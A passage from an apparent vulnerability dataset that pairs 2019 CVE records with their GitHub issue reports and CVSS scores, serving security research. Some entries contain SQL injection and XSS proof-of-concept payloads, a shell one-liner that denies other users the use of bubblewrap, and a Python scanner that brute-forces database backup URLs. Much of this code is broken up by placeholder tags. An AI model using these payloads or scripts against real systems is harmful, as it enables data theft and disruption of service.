fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING I thought about starting to add some debug statements to narrow down causes and see if the crash is exploitable, however I figured I would post something here about the crashes under ASAN. The program appears to exit far more gracefully without ASAN added.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12312",
        "Issue_Url_old": "https://github.com/libreswan/libreswan/issues/246",
        "Issue_Url_new": "https://github.com/libreswan/libreswan/issues/246",
        "Repo_new": "libreswan/libreswan",
        "Issue_Created_At": "2019-05-12T13:12:55Z",
        "description": "NULL pointer dereference and pluto daemon restart in Libreswan NUMBERTAG Hello, I triggered a vulnerability while testing the Libreswan NUMBERTAG IKE NUMBERTAG server. The pluto IKE daemon will restart (due to NULL pointer dereference when built with NSS) by sending two IKE NUMBERTAG packets which are init_IKE and delete_IKE in NUMBERTAG des_cbc mode to Libreswan server. A detailed interactive process is as follows: First, send the first init_IKE message to the server. The server replies the init_IKE message to the client. Then send a delete_IKE message (encrypted) to the server. The server tries to respond INVALID_IKE_SPI to the client, but an exception occurred while preparing to encrypt the message. detailed packets CODETAG Relevant log ERRORTAG My APITAG ERRORTAG Looking forward to your reply, thank you.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12348",
        "Issue_Url_old": "https://github.com/cby234/zzcms/issues/1",
        "Issue_Url_new": "https://github.com/cby234/zzcms/issues/1",
        "Repo_new": "cby234/zzcms",
        "Issue_Created_At": "2019-05-20T08:05:21Z",
        "description": "zzcms NUMBERTAG SQL injection Vulnerability. Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG When we start 'modify' logic we can see 'daohang' var receive $_POST FILETAG We can find ' value in update query it means ' value after 'daohang' parameter does not mean any more. FILETAG FILETAG After 'daohang' paramter 'bannerbg' will appear and if we check about 'bannerbg' parameter we can't find any other security filter. So we can inject any query via 'bannerbg' parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : update SQL injection APITAG a FILETAG FILETAG POC2 : Time based Blind SQL injection APITAG a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12349",
        "Issue_Url_old": "https://github.com/cby234/zzcms/issues/2",
        "Issue_Url_new": "https://github.com/cby234/zzcms/issues/2",
        "Repo_new": "cby234/zzcms",
        "Issue_Created_At": "2019-05-20T08:47:25Z",
        "description": "zzcms NUMBERTAG FILETAG SQL injection. Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG Let's look at SQL query part FILETAG If index of , value is not NUMBERTAG sql will be (/ if(strpos($id NUMBERTAG line NUMBERTAG select from zzcms_dl where saver APITAG '' and id in (\". $id .\")\" There is no single quote for id parameter. So We can inject any sql in id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : Union SQL injection APITAG union select APITAG a, FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12350",
        "Issue_Url_old": "https://github.com/cby234/zzcms/issues/4",
        "Issue_Url_new": "https://github.com/cby234/zzcms/issues/4",
        "Repo_new": "cby234/zzcms",
        "Issue_Created_At": "2019-05-22T07:15:10Z",
        "description": "APITAG Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG APITAG union select APITAG a, FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12351",
        "Issue_Url_old": "https://github.com/cby234/zzcms/issues/3",
        "Issue_Url_new": "https://github.com/cby234/zzcms/issues/3",
        "Repo_new": "cby234/zzcms",
        "Issue_Created_At": "2019-05-22T06:57:39Z",
        "description": "zzcms NUMBERTAG SQL injection in FILETAG . Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG APITAG union select APITAG a, FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12352",
        "Issue_Url_old": "https://github.com/cby234/zzcms/issues/5",
        "Issue_Url_new": "https://github.com/cby234/zzcms/issues/5",
        "Repo_new": "cby234/zzcms",
        "Issue_Created_At": "2019-05-28T00:43:57Z",
        "description": "zzcms NUMBERTAG SQL INJECTION LIST NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is not false sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG xls&sql=select+count NUMBERTAG APITAG &id NUMBERTAG B NUMBERTAG D NUMBERTAG union select APITAG a, FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is not false sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG xls&sql=select+count NUMBERTAG APITAG &id NUMBERTAG B NUMBERTAG D NUMBERTAG union select APITAG a, FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in COOKIE FILETAG When we check the query there is no single quote to COOKIE FILETAG n var will get value via GET FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in COOKIE FILETAG When we check the query there is no single quote to COOKIE FILETAG n var will get value via GET FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : union sql injection tablename=zzcms_main&id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : union Time base sql injection id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : Time base sql injection id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union Time base sql injection id FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12361",
        "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/3",
        "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/3",
        "Repo_new": "coolboy0816/audit",
        "Issue_Created_At": "2019-04-04T08:37:31Z",
        "description": "Empire CMS/URL jump&&reflection XSS&&condition csrf. From parameters for collecting articles payload: post: PATHTAG APITAG APITAG FILETAG Because of Empire CMS automatically jumps when the collection is successful, vulnerabilities are upgraded to remote JS code execution without interaction with users Prove\uff1a FILETAG Loophole utilization\uff1a Set jump to remote URL with attack APITAG the script as follows\uff1a FILETAG APITAG APITAG APITAG APITAG ERRORTAG CODETAG APITAG APITAG APITAG APITAG APITAG FILETAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG Payload contains a conditional APITAG the background source authentication code is not opened in the background security mode, CSRF can be used to change the dynamic page template. Here, we choose to resend the registered activation mail page. The path is PATHTAG The effect of the attack is as follows\uff1a FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12362",
        "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/4",
        "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/4",
        "Repo_new": "coolboy0816/audit",
        "Issue_Created_At": "2019-04-04T09:24:52Z",
        "description": "Empire CMS/reflect xss. When a user logs APITAG XSS exists in Referer pyload\uff1a Referer\uff1ajavascript:alert APITAG JS can be injected into the page by Referer The vulnerability involved is the parameter key in Referer FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-12395",
        "Issue_Url_old": "https://github.com/webbukkit/dynmap/issues/2474",
        "Issue_Url_new": "https://github.com/webbukkit/dynmap/issues/2474",
        "Repo_new": "webbukkit/dynmap",
        "Issue_Created_At": "2019-05-02T08:18:24Z",
        "description": "Required login bypass vulnerability. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Server Information Spigot version NUMBERTAG ersion NUMBERTAG beta NUMBERTAG I can reproduce this issue consistently I have searched for this issue previously and it was either not previously reported. APITAG Issue Description Due to missing login check in APITAG , attacker can see map image without login despite \"login required\" is enabled in configuration. APITAG Reproduce Steps NUMBERTAG Enable APITAG and APITAG in configuration NUMBERTAG Try this APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12439",
        "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/304",
        "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/304",
        "Repo_new": "containers/bubblewrap",
        "Issue_Created_At": "2019-03-02T11:29:02Z",
        "description": "potentially insecure use of /tmp. MENTIONTAG reported this Debian bug NUMBERTAG CVETAG : > [If] PATHTAG doesn't exist and couldn't be created > (as was the case on my system), bubblewrap falls back to > PATHTAG Local attacker could exploit this to prevent > other users from running bubblewrap, for example: > > getent passwd | cut d: f3 | xargs printf PATHTAG | xargs touch > > But it gets worse, because bubblewrap is happy to use existing > PATHTAG even when the directory is owned by some else. > In the worst case, this could be exploited by a local user to execute > arbitrary code in the container. APITAG I couldn't find any way to > exploit this without disabling protected_symlinks.)",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12452",
        "Issue_Url_old": "https://github.com/containous/traefik/issues/4917",
        "Issue_Url_new": "https://github.com/traefik/traefik/issues/4917",
        "Repo_new": "traefik/traefik",
        "Issue_Created_At": "2019-05-29T14:19:49Z",
        "description": "Authentication hashes are available through the API. Do you want to request a feature or report a bug ? Bug Did you try using a NUMBERTAG configuration for the version NUMBERTAG Yes [x] No What did you do? Enabled Traefik API, creating a frontend protected with a user / password Fetched the API What did you expect to see? CODETAG What did you see instead? CODETAG => So I can totally use a rainbow table to de hash the password until NUMBERTAG characters easily (more is challenging as for today), even if there is a salt in the basic auth. Output of traefik version : APITAG version of Traefik are you using?_) CODETAG What is your environment & configuration (arguments, toml, provider, platform, ...)? Simple reproduction case, with a frontend on the API itself for the sake of simplicity: APITAG is user and password is password ) CODETAG If applicable, please paste the log output in DEBUG level ( APITAG switch) Not applicable",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2019-12457",
        "Issue_Url_old": "https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3",
        "Issue_Url_new": "https://github.com/emreovunc/filerun-vulnerabilities/issues/3",
        "Repo_new": "emreovunc/filerun-vulnerabilities",
        "Issue_Created_At": "2019-07-01T18:36:51Z",
        "description": "Remediation. The now available APITAG update APITAG fixes the reported issues. The update can be installed from the APITAG control panel: URLTAG Great work with your findings! Kindly drop us a quick message if you find anything else in the future, to give the many users of our software a chance of protecting themselves. You'd still get the credit for it.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12481",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1249",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1249",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-05-27T07:11:13Z",
        "description": "4 bugs found in gpac NUMBERTAG release. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! x] I looked for a similar issue and couldn't find any. [ ] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG APITAG version APITAG NUMBERTAG description APITAG download link others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source ERRORTAG my dbg CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source CODETAG my debug CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source ERRORTAG mydebug CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG heap buffer overflow description An issue was discovered in APITAG NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. other info ERRORTAG [POC URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-12494",
        "Issue_Url_old": "https://github.com/gardener/vpn/issues/40",
        "Issue_Url_new": "https://github.com/gardener/vpn/issues/40",
        "Repo_new": "gardener/vpn",
        "Issue_Created_At": "2019-03-27T13:01:51Z",
        "description": "Add firewall rules to vpn seed pod. We should block all traffic from the shoot cluster to the control plane in the seed cluster by adding firewall rules to the vpn seed pod.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12499",
        "Issue_Url_old": "https://github.com/netblue30/firejail/issues/2401",
        "Issue_Url_new": "https://github.com/netblue30/firejail/issues/2401",
        "Repo_new": "netblue30/firejail",
        "Issue_Created_At": "2019-02-13T19:35:12Z",
        "description": "CVETAG . Is firejail vulnerable to this? It seems to be a common implementation issue when using privileged namespaces. runc, docker, k8s, lxc, and flatpak have all had patches issued for it. See URLTAG URLTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-12564",
        "Issue_Url_old": "https://github.com/srsec/-srsec-/issues/1",
        "Issue_Url_new": "https://github.com/srsec/-srsec-/issues/1",
        "Repo_new": "srsec/-srsec-",
        "Issue_Created_At": "2019-05-22T08:41:54Z",
        "description": "Any user can view or now, the whole station database backup file. The latest version of APITAG NUMBERTAG Release NUMBERTAG the background can back up the entire station data, but does not have access control on the backup file, resulting in any user can view or now the database file. APITAG in to the background and back up data through the data backup APITAG generate a sql file in the format of the date. FILETAG NUMBERTAG We look at the path generated by the backup file. FILETAG FILETAG APITAG user can access the backup file path through the url, and can view the download backup file. FILETAG FILETAG APITAG file generation format (current date and time format file). FILETAG FILETAG NUMBERTAG follow up APITAG the core file and make no access restrictions on the backup file, resulting in a vulnerability. FILETAG NUMBERTAG POC FILETAG needs to be customized to generate a dictionary in time format)\u3002 import APITAG import time import threading url = input(\"url\uff1a\") txt = APITAG open_url = [] all_url = [] threads = [] Can be customized def search_url(url,txt): with open(txt,'r') as f: for each in f: each = APITAG urllist = url + each +'.sql' APITAG def handle_url(urllist): APITAG try: req = APITAG Judgment return code if APITAG or NUMBERTAG APITAG APITAG file\uff1a\"+urllist+' ') if APITAG APITAG file\uff1a\"+urllist+' ') APITAG except: pass def APITAG search_url(url,txt) for each in all_url: t = APITAG = handle_url,args=(each,)) APITAG APITAG for t in threads: APITAG if open_url: APITAG scan, successful url:\uff1a\") for each in open_url: print(\"[+]\"+each) else: APITAG is a scan to the background of the website (maybe the dictionary is not enough to force)\") if __name__==\"__main__\": Judge program run time start = APITAG APITAG end = APITAG APITAG function spend time is NUMBERTAG f seconds\" %(end start)) APITAG a specific date dictionary file script import time Can be customized for h in range NUMBERTAG for i in range NUMBERTAG for s in range NUMBERTAG if(h NUMBERTAG and i NUMBERTAG and s NUMBERTAG APITAG print(data) elif h NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG APITAG print(data) elif h NUMBERTAG and (i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and i APITAG NUMBERTAG APITAG print(data) elif h NUMBERTAG and (i NUMBERTAG and i APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (i NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (s NUMBERTAG and s NUMBERTAG and (i NUMBERTAG and i NUMBERTAG APITAG print(data) else: APITAG print(data)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12566",
        "Issue_Url_old": "https://github.com/wp-statistics/wp-statistics/issues/271",
        "Issue_Url_new": "https://github.com/wp-statistics/wp-statistics/issues/271",
        "Repo_new": "wp-statistics/wp-statistics",
        "Issue_Created_At": "2019-05-30T05:14:25Z",
        "description": "Page's title should be encoded or filtering html entities/javascript code. I was testing on : Wordpress NUMBERTAG WP Statistic NUMBERTAG Account with Editor role can create Post with Title that contain javascript/html. For example : APITAG FILETAG WP statistics page that use these title will got affected for xss attack, for example : overviews, pages,... FILETAG Even if the Editor delete the Post, but it still remain in top NUMBERTAG page that got most hit, the Overviews page still be affected. So in reality, attacker that controls the Editor account can create page with title that contains maclious javascript code that steal admin cookie (for example), visit it a lot that make it be in top NUMBERTAG page most visited, delete the post so admin wont notice the weird post that have javascript in title. And when admin click on Overviews page of WP Statistic, his cookie will be stolen.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-12589",
        "Issue_Url_old": "https://github.com/netblue30/firejail/issues/2718",
        "Issue_Url_new": "https://github.com/netblue30/firejail/issues/2718",
        "Repo_new": "netblue30/firejail",
        "Issue_Created_At": "2019-05-21T08:36:14Z",
        "description": "seccomp bypass when joining existing jail. seccomp filters are copied into APITAG , and are writable within the jail. A malicious process can modify files from inside the jail. Processes that are later joined to the jail will not have seccomp filters applied. repro steps compile program to call blacklisted syscall CODETAG create interactive jail session APITAG try to run program inside jail, noting syscall is blocked APITAG open new terminal and run program by joining jail, noting syscall is blocked APITAG back in original interactive jail session, empty the APITAG file and attempt to run program, noting syscall is blocked APITAG open new terminal and run program by joining jail, noting syscall is NOT blocked APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 6.0,
        "exploitabilityScore": 2.0
    },
    {
        "CVE_ID": "CVE-2019-12618",
        "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/5783",
        "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/5783",
        "Repo_new": "hashicorp/nomad",
        "Issue_Created_At": "2019-06-05T17:50:45Z",
        "description": "CVETAG : Privilege Escalation in NUMBERTAG It was discovered that exec driver tasks run with full Linux capabilities such that processes can escalate to run as privileged root user, despite running as the Linux unprivileged user, nobody. This vulnerability affects versions NUMBERTAG and NUMBERTAG of Nomad, both OSS and Enterprise and was fixed in NUMBERTAG Background Nomad allows running various types of workloads. The exec driver runs processes in a chroot environment and a lightweight container. By default, Nomad NUMBERTAG runs exec processes as nobody user with no Linux capabilities. This meant that processes could not do any privileged operations, ones commonly associated with root. However, a regression in Nomad NUMBERTAG allows such processes to perform privileged operations that can be malicious. For example, a process can conceivably escape the chroot, kill any host process, read and manipulate any file inside the chroot, or bind to privileged ports NUMBERTAG Some commands (e.g. mount) may block malicious operations directly, as they detect that the user is not root, but a determined attacker can circumvent this protection by performing the kernel system call directly. This vulnerability constitutes a serious unintentional privilege grant, and Nomad NUMBERTAG reverts to Nomad NUMBERTAG capabilities. It is worth noting that the exec driver is not intended to provide strong security isolation, as exec tasks can access any network services on host (including nomad agent if not configured with tls and ACL, and the cloud metadata endpoints). Users are encouraged to use VM based drivers (qemu) or container based drivers (e.g. docker) to enforce stricter security isolation. Remediation Clusters with the exec driver enabled must upgrade to NUMBERTAG Only Nomad clients must be upgraded to fix the vulnerability. Alternatively, the exec driver may be disabled using the client configuration or via Sentinel in Nomad Enterprise. No workaround is present to run exec tasks safely in a NUMBERTAG or NUMBERTAG cluster. To disable the exec task driver use the following configuration on every client node: APITAG See the client configuration documentation URLTAG for more details.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-12728",
        "Issue_Url_old": "https://github.com/grails/grails-core/issues/11250",
        "Issue_Url_new": "https://github.com/grails/grails-core/issues/11250",
        "Repo_new": "grails/grails-core",
        "Issue_Created_At": "2019-02-19T21:52:47Z",
        "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG Public Disclosure Option NUMBERTAG File for a CVE A project maintainer for this project should probably file for a CVE number to inform the public about this vulnerability in the build for this project. The goal is to inform the public that there was a potential for published build artifacts to have been maliciously compromised in earlier releases. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG Option NUMBERTAG Manually validate the release artifacts If this project's build is fully reproducible URLTAG . An alternative to filing for a CVE is to go back and build the earlier releases (with the HTTPS patch applied) to confirm the artifacts were not tampered when they were built. This can be done by comparing the hashes of the artifacts built locally with the ones published. If the hashes of all previous artifacts match those that are published, you can safely assume that the releases were not tampered with. Again, this assumes that the build if fully reproducible and will require significantly more work.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-12732",
        "Issue_Url_old": "https://github.com/ankane/chartkick/issues/488",
        "Issue_Url_new": "https://github.com/ankane/chartkick/issues/488",
        "Repo_new": "ankane/chartkick",
        "Issue_Created_At": "2019-06-04T19:07:47Z",
        "description": "XSS Vulnerability in Chartkick Ruby Gem. Under certain conditions, the Chartkick Ruby gem is vulnerable to a cross site scripting (XSS) attack. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact Chartkick is vulnerable to a cross site scripting (XSS) attack if BOTH the following conditions are met: Condition NUMBERTAG It's used with APITAG (this is not the default for Rails) OR used with a non Rails framework like Sinatra. Condition NUMBERTAG Untrusted data or options are passed to a chart. APITAG All users running an affected release should upgrade immediately.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 2.7,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2019-12741",
        "Issue_Url_old": "https://github.com/jamesagnew/hapi-fhir/issues/1335",
        "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/1335",
        "Repo_new": "hapifhir/hapi-fhir",
